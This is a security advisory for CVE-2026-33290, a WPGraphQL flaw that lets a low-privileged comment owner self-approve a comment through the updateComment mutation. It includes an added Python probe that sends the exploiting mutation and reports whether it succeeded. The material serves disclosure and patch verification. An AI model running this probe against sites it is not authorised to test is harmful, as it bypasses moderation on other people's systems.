PT-2026-27271 · WordPress · Wpgraphql

Sshell · Published 2026-03-23 · Updated 2026-03-24 · CVE-2026-33290

CVSS v3.1: 4.3 (Medium)
Vector: AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
Name of the Vulnerable Software and Affected Versions

WPGraphQL versions prior to 2.10.0

Description

WPGraphQL has an authorization flaw in the updateComment mutation. An authenticated, low-privileged user, even one with no capabilities at all, can change the moderation status of their own comment to APPROVE without holding the moderate_comments capability. This bypasses the moderation workflow and lets untrusted users self-approve their own content.

The root cause is that the authorization check in plugins/wp-graphql/src/Mutation/CommentUpdate.php is owner-based rather than field-based: lines 92 and 99 allow the comment's owner to update the comment, including its status, even without moderation capabilities. The GraphQL input status is mapped directly onto the WordPress comment_approved field in plugins/wp-graphql/src/Data/CommentMutation.php:94:94 and persisted with wp_update_comment() in plugins/wp-graphql/src/Mutation/CommentUpdate.php:120:120. The CommentStatusEnum in plugins/wp-graphql/src/Type/Enum/CommentStatusEnum.php:22:22 exposes the moderation states as input values, so the status argument of updateComment can be set to APPROVE by the comment's owner to bypass moderation.

Recommendations

Update to WPGraphQL version 2.10.0 or later. Comments approved through this path were approved by their own authors, so on an installation that ran an affected version it is worth reviewing recently approved comments whose authors lack the moderate_comments capability.
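The following probe is an added example for this advisory, not code from the advisory or from the WPGraphQL project. It builds the updateComment request described above (a low-privileged comment owner setting status to APPROVE) and classifies the server's reply. Everything about the schema is an assumption: that the endpoint is at /graphql, that UpdateCommentInput takes id (the comment's global Relay ID) and status (a CommentStatusEnum value), and that the returned Comment exposes status. The sample values used in the docstrings and tests are constructed placeholders.

```python
"""Probe a WPGraphQL site for CVE-2026-33290 (self-approval via updateComment).

Added example, not the advisory's or the project's code. Assumptions: the
endpoint lives at /graphql, UpdateCommentInput takes `id` (the comment's
global Relay ID) and `status` (a CommentStatusEnum value), and the returned
Comment object exposes `status`. Run it with the credentials of a
low-privileged test user against a pending comment that user owns.
"""
import argparse
import json
import urllib.request

GRAPHQL_PATH = "/graphql"  # WPGraphQL's default endpoint path (assumption)

UPDATE_COMMENT_MUTATION = """
mutation SelfApprove($id: ID!, $status: CommentStatusEnum) {
  updateComment(input: {id: $id, status: $status}) {
    comment {
      id
      status
    }
  }
}
"""


def build_update_comment_request(comment_id: str, status: str = "APPROVE") -> dict:
    """Return the JSON body the comment owner POSTs to change the status.

    On affected versions (< 2.10.0) the owner-based check accepts this even
    when the caller lacks moderate_comments; APPROVE is the value that
    publishes a held comment.
    """
    return {
        "operationName": "SelfApprove",
        "query": UPDATE_COMMENT_MUTATION,
        "variables": {"id": comment_id, "status": status},
    }


def classify_response(body: dict) -> str:
    """Interpret the server's reply to the mutation above.

    'applied' : the returned comment carries the requested APPROVE status,
                i.e. the status change went through for a non-moderator.
    'refused' : the server answered with GraphQL errors and no comment,
                which is what a field-based capability check should produce.
    'unknown' : anything else (transport noise, unexpected shape).
    """
    errors = body.get("errors") or []
    payload = (body.get("data") or {}).get("updateComment") or {}
    comment = payload.get("comment") or {}
    if comment.get("status") == "APPROVE":
        return "applied"
    if errors and not comment:
        return "refused"
    return "unknown"


def send_request(site_url: str, payload: dict, auth_header: str) -> dict:
    """POST the mutation as the low-privileged user and decode the JSON reply.

    `auth_header` is the Authorization header value your WPGraphQL install
    accepts for that user; obtaining it is the operator's job, nothing here
    creates users or tokens.
    """
    req = urllib.request.Request(
        site_url.rstrip("/") + GRAPHQL_PATH,
        data=json.dumps(payload).encode("utf-8"),
        headers={"Content-Type": "application/json",
                 "Authorization": auth_header},
        method="POST",
    )
    with urllib.request.urlopen(req, timeout=15) as resp:
        return json.load(resp)


if __name__ == "__main__":
    ap = argparse.ArgumentParser(description=__doc__.splitlines()[0])
    ap.add_argument("site_url", help="e.g. https://staging.example.test")
    ap.add_argument("comment_id", help="global ID of a pending comment the user owns")
    ap.add_argument("auth_header", help="Authorization header value for the test user")
    args = ap.parse_args()
    reply = send_request(args.site_url,
                         build_update_comment_request(args.comment_id),
                         args.auth_header)
    print(json.dumps(reply, indent=2))
    print("result:", classify_response(reply))
```

Run it only against a staging copy or a comment you created for the purpose: if the site is affected, the probe publishes that comment. A reply classified as "applied" for a user without moderate_comments means the owner-based check is still in place; "refused" is the expected outcome on 2.10.0 or later, but confirm the installed plugin version rather than relying on the probe alone, since an error can also come from an invalid comment ID or a failed login.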

Weakness Enumeration

Missing Authorization

Related Identifiers

CVE-2026-33290
GHSA-9HC3-MH5H-4FGH

Affected Products

Wpgraphql